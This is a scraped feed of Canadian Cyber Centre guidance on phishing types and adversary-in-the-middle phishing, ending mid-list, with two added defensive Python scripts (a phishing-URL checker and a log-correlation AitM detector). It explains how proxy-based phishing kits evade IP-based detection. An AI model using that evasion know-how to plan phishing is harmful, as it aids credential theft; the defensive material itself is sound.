referrer</span></a></p> </dd> <dt>Footnote 33</dt> <dd id="fn33"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/alerts/2023/11/28/exploitation-unitronics-plcs-used-water-and-wastewater-systems">Alert – Exploitation of Unitronics <abbr title="Programmable Logic Controllers">PLC</abbr>s used in Water and Wastewater Systems</a>. 
November 28, 2023.</p> <p class="fn-rtn"><a href="#fn33-rf"><span class="wb-inv">Return to footnote</span>33<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></div> </div> </div> </div> </div> </article>

  • Don’t take the bait: Recognize and avoid phishing attacks – ITSAP.00.101
    by Canadian Centre for Cyber Security on November 24, 2025 at 1:08 pm

    <article data-history-node-id="734" about="/en/guidance/dont-take-bait-recognize-and-avoid-phishing-attacks" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout--onecol"> <div class="layout__region layout__region--content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><div class="row"><!--Info across the top under the image--> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>November 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.00.101</strong></p> </div> <!--MOBILE STARTS HERE--> <div class="hidden-lg hidden-md text-center"> <p><strong>November 2025 | Awareness series</strong></p> </div> <!--pdf download--> <div class="col-md-12 mrgn-tp-lg"><!--<div class="mrgn-bttm-md well well-sm col-md-4 pull-right mrgn-lft-md col-sm-12 col-xs-12"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/ITSAP00101-e.pdf">Don’t take the bait: Recognize and avoid phishing attacks&nbsp;- ITSAP.00.101 (PDF,&nbsp;307&nbsp;KB)</a></p> </div>--> <p>Phishing is a form of social engineering where threat actors send communications that appear legitimate to trick or motivate individuals into:</p> <ul><li>revealing sensitive or personal information</li> <li>clicking on links that direct them to malicious websites</li> <li>downloading malicious attachments</li> <li>transferring money</li> </ul><section><h2 class="text-info h3">On this page</h2> <ul><li><a 
href="#1">Types of phishing</a></li> <li><a href="#2">Artificial intelligence and phishing</a></li> <li><a href="#3">How to identify a phishing attack</a></li> <li><a href="#4">How to protect your organization from phishing</a></li> <li><a href="#5">Learn more</a></li> </ul></section></div> </div> <h2 class="text-info" id="1">Types of phishing</h2> <p>Phishing attempts are often generic mass messages that appear to be legitimate messages from a trusted source (for example, a bank, online retailer, courier service, or utility company). Threat actors often take advantage of crises, conflicts or world events to launch phishing attacks against individuals, financial institutions, governments and critical infrastructure sectors.</p> <p>There are several types of phishing.</p> <h3>Deceptive phishing</h3> <p>Deceptive phishing is one of the most common types of attack and occurs when a cybercriminal pretends to be a legitimate company to steal your personal information or login credentials. The threat actor may send you a link to a fraudulent website that closely mimics an official site, using deliberate misspellings that look almost identical to a legitimate URL. 
Threat actors may also send a quick response (QR) code, which makes it more difficult for potential victims to spot the attack.</p> <p>Common deceptive phishing techniques include:</p> <ul><li><strong>homograph exploits:</strong> threat actors use characters from different alphabets (for example, Cyrillic or Greek) that look almost identical to standard Latin letters but are coded differently, for example in “www.<span>аррle</span>.com” the “a” and “p” are from the Cyrillic alphabet, but look like their Latin counterparts</li> <li><strong>typo squatting:</strong> threat actors register domain names that are common misspellings of well-known websites, exploiting typing errors so that potential victims are not always aware that they are on the wrong website</li> <li><strong>legitimate-looking subdomains:</strong> threat actors take control of a subdomain that is no longer actively used by its legitimate owner or create subdomains that mimic legitimate ones (for example, “login.google.com.example.com” instead of “login.google.com”), often using names, logos or branding elements that are similar to legitimate ones</li> </ul><h3>Spear phishing</h3> <p>Spear phishing is a personalized attack that targets a specific individual, company or organization. The message includes personal details about the potential victim, such as interests, recent online activities or purchases.</p> <h3>Whaling</h3> <p>Whaling is a personalized attack that targets a big “phish” like a CEO or executive. A threat actor chooses these targets because of their level of authority and possible access to more sensitive information or large amounts of money.</p> <h3>Quishing</h3> <p>Quishing is a phishing attack that uses <abbr title="quick response">QR</abbr> codes. 
The threat actor may send a <abbr title="quick response">QR</abbr> code via email, cover a legitimate <abbr title="quick response">QR</abbr> code with a malicious <abbr title="quick response">QR</abbr> code or place a malicious <abbr title="quick response">QR</abbr> code in a public, high-traffic area. The victim scans the <abbr title="quick response">QR</abbr> code, which redirects them to a malicious website. Quishing can bypass email security protection that scans for malicious links and attachments.</p> <h3>Smishing</h3> <p>A smishing attack uses deceptive short message service (SMS), also known as text messages, to manipulate victims into divulging sensitive personal information such as bank account details, credit card numbers or login credentials.</p> <h3>Vishing</h3> <p>Vishing is short for “voice phishing” and involves defrauding people over the phone and getting them to divulge sensitive information. A threat actor can fake or spoof their caller ID information or use a voice changer to make victims believe they are legitimate. Voices generated by artificial intelligence (AI) can sound like family members or friends.</p> <p>A vishing scheme may also target the victim’s voice. In this instance, the threat actor collects a sample of the victim’s voice to conduct fraud (for example, to use the sample for voice authentication to access an account).</p> <h3>Angler phishing</h3> <p>Angler phishing is an emerging cyber threat that leverages social media platforms to post attractive but false information to “lure” targets into initiating contact. Threat actors may impersonate legitimate companies or brands through fake accounts, posts, direct messages or ads. 
They often create fake customer support profiles or use social media interactions (for example, responding to complaints or questions) to convince users to click on malicious links, visit counterfeit websites or share personal details.</p> <p>This is a powerful attack because the target initiates contact with the threat actor—bypassing trust concerns—and provides an immediate and active interaction, rather than a passive and delayed interaction.</p> <h3>Catfishing</h3> <p>Catfishing is typically conducted through online platforms like dating websites. The threat actor fakes an identity or creates a persona to gain the target’s trust and defraud or extort them. The threat actor, or catfish, generally makes excuses to avoid in-person interactions. One of the more common forms of catfishing involves tricking the victim into an online romantic relationship.</p> <h3>Pharming</h3> <p>Pharming is a more advanced technique in which cybercriminals try to redirect users to fake websites that look identical to legitimate ones, like online banking sites, e-commerce platforms or social media networks. The goal of these attacks is to trick users into providing sensitive or personal information, such as usernames, passwords or credit card numbers.</p> <p>While phishing relies on emails or messages to trick users into providing personal information, pharming uses malware or manipulates domain name systems (DNS) to redirect users to fraudulent websites designed to capture their personal information.</p> <h2 class="text-info" id="2">Artificial intelligence and phishing</h2> <p><abbr title="artificial intelligence">AI</abbr> is rapidly reshaping the cyber security landscape, introducing enhanced capabilities for defence and new avenues for exploitation. One concerning emerging threat is the use of <abbr title="artificial intelligence">AI</abbr> to automate and refine phishing attacks. 
<abbr title="artificial intelligence">AI</abbr> enhances the effectiveness of phishing attacks and reduces the time and effort needed for threat actors to conduct these attacks.</p> <p>Recent advances in generative <abbr title="artificial intelligence">AI</abbr> make it more difficult for users to identify phishing attempts. Generative <abbr title="artificial intelligence">AI</abbr> can be used to produce highly realistic content, including text, images, video and audio. Because this content is so polished and realistic, it is harder to distinguish fraudulent communications from legitimate ones.</p> <p><abbr title="artificial intelligence">AI</abbr> also enables threat actors to gather and analyze publicly available data on potential targets, allowing them to craft highly personalized spear phishing and whaling messages.</p> <p>These messages can be tailored to reflect individual interests, online activity, familial connections or professional relationships—substantially increasing the likelihood of victims engaging with the threat actor.</p> <p><abbr title="artificial intelligence">AI</abbr> is also playing a critical role in strengthening our cyber defences. Sophisticated <abbr title="artificial intelligence">AI</abbr>-based intrusion detection systems can analyze large volumes of data, assess user behaviour, examine metadata and message content, and identify anomalies that may indicate a threat. These systems enable faster, more accurate identification and mitigation of phishing attempts and other cyber risks. As the threat landscape evolves, organizations must continue to invest in both <abbr title="artificial intelligence">AI</abbr> technology and <abbr title="artificial intelligence">AI</abbr> awareness to stay ahead of increasingly sophisticated attacks.</p> <h2 class="text-info" id="3">How to identify a phishing attack</h2> <p>Phishing attacks can be delivered in many ways, but they all play on trust, urgency and other aspects of human psychology. 
A phishing message may play on fear, excitement, deference to authority, curiosity or trust. Phishing attacks typically follow a similar sequence. Knowing how to identify these steps can help protect your organization against phishing.</p> <h3>Step 1: The bait</h3> <p>As described above, there are many ways that the threat actor can set the bait. They may craft a message that appears to come from a well-known bank or service provider. They use spoofing techniques and send the message to numerous recipients in the hope that some will take the bait.</p> <p>In spear phishing and whaling attacks, the threat actor first gathers details about the target. For example, they harvest information from social media profiles, company websites and Internet activity to create a customized message.</p> <p>In vishing attacks, the threat actor might use a computerized auto-dialler (known as a robocall) or an <abbr title="artificial intelligence">AI</abbr>-generated voice of a known person to deliver the fraudulent message to many victims.</p> <h3>Step 2: The hook</h3> <p>The hook occurs when the victim believes the message is from a trusted source and the message contains information that entices the victim to take immediate action. For example, the message may ask the user to resolve an urgent issue with their account.</p> <p>If the victim clicks the link in the message, they will unknowingly be redirected to the threat actor’s fake version of the real website. The victim provides sensitive information, such as login credentials, which is sent to the threat actor. If the victim opens a malicious attachment, their device may become infected when the code executes.</p> <h3>Step 3: The attack</h3> <p>Threat actors can use stolen user credentials to access the victim’s accounts. They may use an infiltrated email account to send more phishing emails to the victim’s contacts. 
If the victim has privileged access (for example, to an organization or company account, system or network), the threat actor could gain access to sensitive corporate data and critical systems.</p> <p>If a threat actor successfully deploys malware to your organization’s network or systems, they can use it to gain control of devices, steal data or deny access to files—for example, by encrypting them—until a ransom is paid.</p> <h3>Phishing characteristics</h3> <p>Although <abbr title="artificial intelligence">AI</abbr> is making it hard to detect certain phishing characteristics, such as poor spelling or a robotic tone, there are other signs to be aware of.</p> <p>Something may be <strong>phishy</strong> if:</p> <ul><li>the sender makes an urgent request with a deadline</li> <li>the sender requests your personal or confidential information</li> <li>the sender asks you to log in via a provided link</li> <li>the offer sounds too good to be true</li> <li>the communication is unsolicited and includes: <ul><li>attachments</li> <li>links to websites or web forms (these may be spoofed)</li> <li><abbr title="quick response">QR</abbr> codes</li> <li>login pages</li> <li>a claim to be government or bank officials</li> </ul></li> <li>you don’t recognize the sender <ul><li>remember, addresses can be spoofed</li> <li>a known sender isn’t necessarily a trusted sender</li> </ul></li> </ul><h2 class="text-info" id="4">How to protect your organization from phishing</h2> <p>You can protect your organization’s information and infrastructure from phishing attacks by:</p> <ul><li>using trusted anti-phishing technology, such as the <a href="https://www.cira.ca/en/cybersecurity/">Canadian Internet Registration Authority (CIRA) Canadian Shield</a> <abbr title="domain name systems">DNS</abbr> resolver</li> <li>using anti-phishing software that aligns with the <a href="https://dmarc.org/">Domain-based Message Authentication, Reporting, and Conformance (DMARC) policy</a></li> <li>backing up 
information so that you have another copy</li> <li>applying software updates and patches</li> <li>blocking <abbr title="internet protocol">IP</abbr> addresses, domain names and file types that are known to be malicious</li> <li>favouring in-person interactions, using cash and meeting in the office whenever possible; threat actors will try to find ways to avoid in-person interactions</li> <li>establishing protocols and procedures for your employees to verify and report suspicious communications internally</li> <li>using multi-factor authentication (MFA) on all systems, especially on shared corporate media accounts</li> <li>updating your organization’s incident response plan to include steps to take in response to a successful phishing attack</li> </ul><p>Your employees can reduce their risk of falling victim to a phishing attack by:</p> <ul><li>remaining calm; phishing depends on creating a sense of urgency</li> <li>avoiding sending sensitive information by email or text</li> <li>reducing the amount of personal information they post online</li> <li>enabling a spam blocker in their mobile device application settings</li> <li>avoiding using any form of simplified contact response, such as clicking on hyperlinks, loading <abbr title="quick response">QR</abbr> codes or replying to suspicious texts</li> <li>filtering spam emails (unsolicited junk emails sent in bulk)</li> <li>verifying the sender’s legitimacy by contacting the sender through a separate channel, for example: <ul><li>if they receive a call from their bank, hanging up and visiting or calling their local branch</li> <li>if they receive an email from their Internet service provider, contacting the service provider through their web form</li> <li>if they receive a text from a company or provider on their phone, responding by email from their computer</li> </ul></li> <li>avoiding <abbr title="short message service">SMS</abbr> over the air, flash call (a near-instant dropped call that is automatically placed to 
a mobile number) and <abbr title="short message service">SMS</abbr> as an <abbr title="multi-factor authentication">MFA</abbr> method</li> </ul><h3>Training and awareness</h3> <p>Employees should understand the importance of protecting their personal information and the organization’s information. Employees who are unaware of the signs of a social engineering attack might reveal information, whether sensitive or not. They may also unknowingly infect organizational devices, systems and networks.</p> <p>Phishing attacks are less likely to be successful when your workforce is informed and has received training on how to handle personal information, such as privacy awareness training, and on cyber security best practices. Organizations should also conduct internal phishing simulations to enhance employees’ understanding of the risks. This will help employees detect and avoid phishing attacks in a safe environment.</p> <p>Organizations can discuss smishing and vishing protection mechanisms with their telecommunications providers. 
Often, mobile network operators are better positioned to block attempts before these attempts reach users.</p> <h2 class="text-info" id="5">Learn more</h2> <ul><li><a href="/en/guidance/tips-backing-your-information-itsap40002">Tips for backing up your information (ITSAP.40.002)</a></li> <li><a href="/en/guidance/how-updates-secure-your-device-itsap10096">How updates secure your device (ITSAP.10.096)</a></li> <li><a href="/en/guidance/protect-your-organization-malware-itsap00057">Protect your organization from malware (ITSAP.00.057)</a></li> <li><a href="/en/guidance/secure-your-accounts-and-devices-multi-factor-authentication-itsap30030">Secure your accounts and devices with multi-factor authentication (ITSAP 30.030)</a></li> <li><a href="/en/guidance/spotting-malicious-email-messages-itsap00100">Spotting malicious email messages (ITSAP.00.100)</a></li> <li><a href="/en/guidance/implementation-guidance-email-domain-protection">Implementation guidance: email domain protection (ITSP.40.065 v1.1)</a></li> <li><a href="/en/guidance/security-considerations-qr-codes-itsap00141">Security considerations for <abbr title="quick response">QR</abbr> codes (ITSAP.00.141)</a></li> </ul></div> </div> </div> </div> </div> </article>
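The three URL tricks listed under deceptive phishing in the article above (homograph labels built from look-alike characters, typo-squatted domains and deceptive subdomains such as "login.google.com.example.com") can all be checked mechanically before anyone clicks. The script below is an added example, not Cyber Centre code and not part of ITSAP.00.101. It assumes a small constructed list of trusted domains, uses the standard library only, and deliberately simplifies the "registrable domain" to the last two labels; a production check would use the Public Suffix List so that names under suffixes like gc.ca are handled correctly.

```python
"""Checks for the deceptive-phishing URL tricks described in ITSAP.00.101:
mixed-script (homograph) labels, typo-squatted look-alikes and deceptive
subdomains. Added example, not Cyber Centre code; all inputs are constructed."""
import unicodedata
from urllib.parse import urlsplit

# Constructed list of domains this organisation treats as trusted (assumption).
TRUSTED_DOMAINS = frozenset({"google.com", "apple.com", "canada.ca"})


def hostname_of(url: str) -> str:
    """Lowercase host part of a URL; a bare host without a scheme is accepted too."""
    if "://" not in url:
        url = "http://" + url
    host = urlsplit(url).hostname or ""
    return host.rstrip(".").lower()


def scripts_in(label: str) -> set:
    """Unicode scripts used in one DNS label (LATIN, CYRILLIC, GREEK, ...).
    Digits and hyphens are shared by every script and are ignored."""
    scripts = set()
    for ch in label:
        if ch.isdigit() or ch == "-":
            continue
        scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts


def registrable_domain(host: str) -> str:
    """Simplified owner of a host: its last two labels (assumption). A production
    check would use the Public Suffix List so that gc.ca or co.uk names resolve
    to the correct registrant."""
    return ".".join(host.split(".")[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a distance of 1 is a single typo or dropped character."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def check_url(url: str, trusted=TRUSTED_DOMAINS) -> list:
    """Human-readable warnings for a URL; an empty list means no trick was found."""
    host = hostname_of(url)
    warnings = []

    # 1. Homograph: a label that mixes scripts, or is not Latin at all, is shown by
    #    browsers in its punycode (xn--) form, which is what the user should compare.
    for label in host.split("."):
        scripts = scripts_in(label)
        if len(scripts) > 1 or (scripts and scripts != {"LATIN"}):
            puny = label.encode("idna").decode("ascii")
            warnings.append(
                f"label '{label}' uses scripts {sorted(scripts)}; browsers show it as '{puny}'")

    owner = registrable_domain(host)
    for t in sorted(trusted):
        # 2. Deceptive subdomain: the trusted name is present in the host, but a
        #    different registrable domain actually controls it.
        if t in host and owner != t:
            warnings.append(f"host contains '{t}' but is controlled by '{owner}'")
        # 3. Typo-squat: the registrable domain is one edit away from a trusted one.
        elif owner != t and edit_distance(owner, t) == 1:
            warnings.append(f"'{owner}' is one keystroke away from trusted domain '{t}'")
    return warnings


if __name__ == "__main__":
    # Constructed sample URLs: one clean, then one per trick.
    for sample in ("https://login.google.com/",
                   "www.\u0430\u0440\u0440le.com",          # Cyrillic a and er
                   "https://login.google.com.example.com/signin",
                   "gooogle.com"):
        print(sample, "->", check_url(sample) or ["no warnings"])
```

Run it directly to see the warnings for the four constructed samples, or import `check_url` into a mail-gateway or help-desk triage script. The script flags any non-Latin label, so an organisation whose legitimate domains use another script would adjust `scripts_in` accordingly; it is a triage aid that complements, rather than replaces, a protective DNS resolver such as the CIRA Canadian Shield service mentioned in the protection list above.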

  • Joint guidance on mitigating risks from bulletproof hosting providers
    by Canadian Centre for Cyber Security on November 19, 2025 at 2:05 pm

    This joint guidance provides recommendations to Internet service providers (ISPs) and network defenders to mitigate potential cybercriminal activity enabled by BPH providers.

  • Joint guidance on Microsoft Exchange Server security best practices
    by Canadian Centre for Cyber Security on October 30, 2025 at 4:14 pm

    This joint guidance provides security best practices to help administrators harden on-premises Exchange servers by enforcing a prevention posture and hardening authentication and encryption.

  • Defending against adversary-in-the-middle threats with phishing-resistant multi-factor authentication (ITSM.30.031)
    by Canadian Centre for Cyber Security on October 30, 2025 at 4:10 pm

    <article data-history-node-id="6927" about="/en/guidance/defending-against-adversary-middle-threats-phishing-resistant-multi-factor-authentication-itsm30031" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout--onecol"> <div class="layout__region layout__region--content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>October 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Management series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSM.30.031</strong></p> </div> <!--MOBILE STARTS HERE--> <div class="hidden-lg hidden-md text-center"> <p><strong>October 2025 | Management series</strong></p> </div> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsm.30.031-e.pdf">Defending against adversary-in-the-middle threats with phishing-resistant multi-factor authentication – ITSM.30.031 (PDF, 1.5 MB)</a></p> </div> <h2 class="text-info mrgn-tp-0" id="0">Overview</h2> <p>In the ever-evolving landscape of cyber security, the rise of adversary-in-the-middle (AitM) phishing poses a significant threat to organizations. 
<abbr title="adversary-in-the-middle">AitM</abbr> phishing has become increasingly popular among threat actors as organizations move to the cloud, shifting the frontline from defending traditional network perimeters to prioritizing identity protection.</p> <p>Security requirements have grown increasingly complex, particularly in cloud environments, and threat actors have refined their tactics. As a result, implementing phishing-resistant multi-factor authentication (MFA) is critical for organizations to maintain strong cyber security.</p> <p>This publication provides details on observed <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns to highlight their prevalence and demonstrate the risk of leaving cloud accounts vulnerable. All findings in this publication are based on over 100 campaigns that the Canadian Centre for Cyber Security (Cyber Centre) detected targeting Microsoft Entra ID accounts between 2023 and early 2025. Although this is not a comprehensive overview of all <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns happening globally, it offers a snapshot of how widespread these campaigns have become.</p> <p>This publication aims to:</p> <ul><li>provide a comprehensive understanding of where these threats originate</li> <li>highlight the need for all organizations to strengthen defences by employing phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> by default</li> <li>provide recommendations to enhance organizations’ security postures against these sophisticated campaigns</li> </ul></div> </div> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#0">Overview</a></li> <li><a href="#1">Understanding adversary-in-the-middle phishing and its impact</a></li> <li><a href="#2">Transition to proxy-based adversary-in-the-middle phishing</a></li> <li><a href="#3">Adversary-in-the-middle phishing trends and techniques</a> 
<ul><li><a href="#3.1">Business email compromise phishing campaigns</a></li> <li><a href="#3.2">Living off trusted sites techniques</a></li> </ul></li> <li><a href="#4">Targeted sectors</a></li> <li><a href="#5">The importance of phishing-resistant multi-factor authentication</a></li> <li><a href="#6">Enhancing defences against evolving adversary-in-the-middle threats</a> <ul><li><a href="#6.1">Addressing high-risk gaps and vulnerabilities</a></li> <li><a href="#6.2">Educating employees</a></li> </ul></li> <li><a href="#7">Summary</a></li> </ul></details></section><section><h2 class="text-info" id="1">Understanding adversary-in-the-middle phishing and its impact</h2> <p><abbr title="adversary-in-the-middle">AitM</abbr> phishing is a technique where a threat actor intercepts the connection between a user and a login server. The threat actor captures all usernames, passwords, <abbr title="multi-factor authentication">MFA</abbr> secrets and tokens transferred over that connection. Users typically receive a phishing email with a link to a malicious phishing site impersonating a legitimate website. The user is then tricked into providing their login details and completing the <abbr title="multi-factor authentication">MFA</abbr> process. 
The threat actor logs that information to impersonate the user later.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 1: Phishing campaign by threat actor</figcaption><img alt="Figure 1 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig1-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 1: Phishing campaign by threat actor</summary><p>This figure illustrates how a threat actor might route and deliver a phishing email with a link to an <abbr title="adversary-in-the-middle">AitM</abbr> phishing site.</p> <ol><li>The user receives a phishing email with a link.</li> <li>The user goes to the site, where they see what appears to be a legitimate login portal.</li> <li>The <abbr title="adversary-in-the-middle">AitM</abbr> site then proxies all connections to the login portal.</li> <li>The login portal prompts the user for multi-factor authentication (MFA).</li> <li>The user completes non-phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>.</li> <li>This action returns a validated token and session cookie to the <abbr title="adversary-in-the-middle">AitM</abbr> site.</li> <li>The phishing site redirects the user to a different site that appears to be legitimate.</li> </ol></details></div> </div> <p><abbr title="adversary-in-the-middle">AitM</abbr> phishing is not a new concept. It has become increasingly popular among threat actors since organizations moved to the cloud. Before that, organizations worked hard to defend their frontline—the network perimeter—with firewalls and virtual private networks (VPNs). Now, organizations must strengthen cyber security to defend their new frontline, the cloud. 
To do this, they must protect cloud identity with a modernized set of tools, such as conditional access policies (CAPs) and <abbr title="multi-factor authentication">MFA</abbr>.</p> <p>It is difficult to secure a cloud environment against <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns. The cloud comes with complex security requirements that are constantly changing as threat actors increase campaigns against cloud identities. This highlights the importance of the shared responsibility model, where both clients and cloud service providers (CSPs) work together to build a robust security posture. Phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> is the new industry standard. It ensures stronger identity security and is more resilient than relying solely on passwords or traditional <abbr title="multi-factor authentication">MFA</abbr> methods.</p> <p>Threat actors can execute <abbr title="adversary-in-the-middle">AitM</abbr> phishing easily by leveraging no-code solutions, such as dark web <abbr title="adversary-in-the-middle">AitM</abbr> providers or open-source <abbr title="adversary-in-the-middle">AitM</abbr> toolkits for self-run setups. 
These campaigns can be thwarted by:</p> <ul><li>phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> factors</li> <li>specific <abbr title="conditional access policies">CAPs</abbr> that require registered device sign-ins</li> <li>specific <abbr title="conditional access policies">CAPs</abbr> that only allow sign-ins from specific Internet Protocol (IP) ranges or addresses that an organization owns</li> </ul><h2 class="text-info" id="2">Transition to proxy-based adversary-in-the-middle phishing</h2> <p>Threat actors conducting <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns evade detection by using relay proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kits. A phishing kit is a pre-assembled set of digital tools that allows threat actors to easily create fake websites and harvest sensitive user information. These fake websites often mimic trusted brands to deceive users.</p> <p>Before proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kits, organizations could detect <abbr title="adversary-in-the-middle">AitM</abbr> phishing by looking for suspicious logins to their cloud environment and comparing those <abbr title="internet protocol">IP</abbr> addresses against outbound network connections recorded from their own network. 
A login from a suspicious <abbr title="internet protocol">IP</abbr> and network connections to a suspicious website hosted on that same <abbr title="internet protocol">IP</abbr> was a good indication of an <abbr title="adversary-in-the-middle">AitM</abbr> campaign.</p> <p>However, proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kits work by adding a series of proxies in between the user and the identity provider. This means the <abbr title="internet protocol">IP</abbr> from the user login will not be the same <abbr title="internet protocol">IP</abbr> that appears to be hosting the phishing website. There are many ways that threat actors can achieve this, so organizations can no longer rely on <abbr title="internet protocol">IP</abbr>-based correlation to detect all <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns.</p> <p>In mid-2024, the Cyber Centre added new internal detection capabilities for proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing and began detecting many more campaigns. This correlated with a decline in detected traditional <abbr title="adversary-in-the-middle">AitM</abbr> phishing. 
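The IP-correlation check described above, and the way a proxy-based kit slips past it, as an added Python example that is not part of the Cyber Centre publication; the log fields, hostnames and addresses are constructed assumptions, and the registered-device flag stands in for what a registered device CAP would check.

```python
"""IP-correlation heuristic for AitM phishing, and why proxy-based kits defeat it.

Constructed example, not Cyber Centre code. Inputs are simplified records:
cloud sign-ins as the identity provider sees them, and outbound web
connections from the corporate network (proxy or firewall logs). Field names,
hostnames (.example) and addresses (RFC 5737 documentation ranges) are
assumptions, not a real log schema.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class SignIn:
    time: datetime
    user: str
    ip: str                  # source address of the authentication at the IdP
    registered_device: bool  # sign-in came from a device registered with IT


@dataclass(frozen=True)
class Egress:
    time: datetime
    user: str
    dst_ip: str
    dst_host: str


def correlate(signins, egress, window=timedelta(minutes=30)):
    """Flag a sign-in whose source IP was, shortly before, the destination of an
    outbound connection by the same user. That is the footprint of a traditional
    AitM kit: the phishing site and the relayed login share one host.
    Returns {(user, ISO sign-in time): verdict dict}."""
    by_user = {}
    for e in egress:
        by_user.setdefault(e.user, []).append(e)
    verdicts = {}
    for s in signins:
        hits = sorted({e.dst_host for e in by_user.get(s.user, [])
                       if e.dst_ip == s.ip and s.time - window <= e.time <= s.time})
        verdicts[(s.user, s.time.isoformat())] = {
            "verdict": "ip_correlated_aitm" if hits else "no_ip_correlation",
            "phishing_hosts": hits,
            # A registered-device CAP does not depend on addresses at all: a
            # sign-in from an unregistered device is refused however many
            # proxies sit between the kit and the identity provider.
            "stopped_by_registered_device_cap": not s.registered_device,
        }
    return verdicts


T = datetime(2025, 1, 15, 10, 0)  # constructed timestamps

EGRESS = [
    # alice browses to a lookalike portal hosted on 198.51.100.20 (traditional kit)
    Egress(T, "alice", "198.51.100.20", "login-portal-lookalike.example"),
    # bob browses to a lookalike on 203.0.113.7; the kit relays his login to the
    # identity provider through a separate proxy at 192.0.2.55 (proxy-based kit)
    Egress(T + timedelta(hours=1), "bob", "203.0.113.7", "docs-share-lookalike.example"),
    # carol reads the news from the office
    Egress(T + timedelta(hours=2), "carol", "203.0.113.200", "news.example"),
]

SIGNINS = [
    SignIn(T + timedelta(minutes=2), "alice", "198.51.100.20", False),
    SignIn(T + timedelta(hours=1, minutes=3), "bob", "192.0.2.55", False),
    SignIn(T + timedelta(hours=2, minutes=5), "carol", "192.0.2.10", True),  # office egress IP
]


def detect_sample():
    """Run the heuristic over the constructed logs."""
    return correlate(SIGNINS, EGRESS)


if __name__ == "__main__":
    for key, verdict in detect_sample().items():
        print(key, verdict)
```

Only alice's sign-in is caught by address correlation; bob's proxy-based relay shows no shared address, which is exactly the gap the publication describes, while the registered-device check would have refused both.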
Threat actors have almost entirely shifted from traditional <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns to proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 2: Comparison of detected traditional and proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns</figcaption><img alt="Figure 2 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig2-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 2: Comparison of detected traditional and proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns</summary><p>This bar graph illustrates a comparison of detected traditional and proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns, based on campaigns that the Cyber Centre was able to confidently categorize between 2023 and mid-2025.</p> <ul class="list-unstyled"><li>January 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>February 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>March 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr> 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> 0%</li> <li>April 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>May 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: NIL; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: NIL</li> <li>June 2023: Traditional <abbr 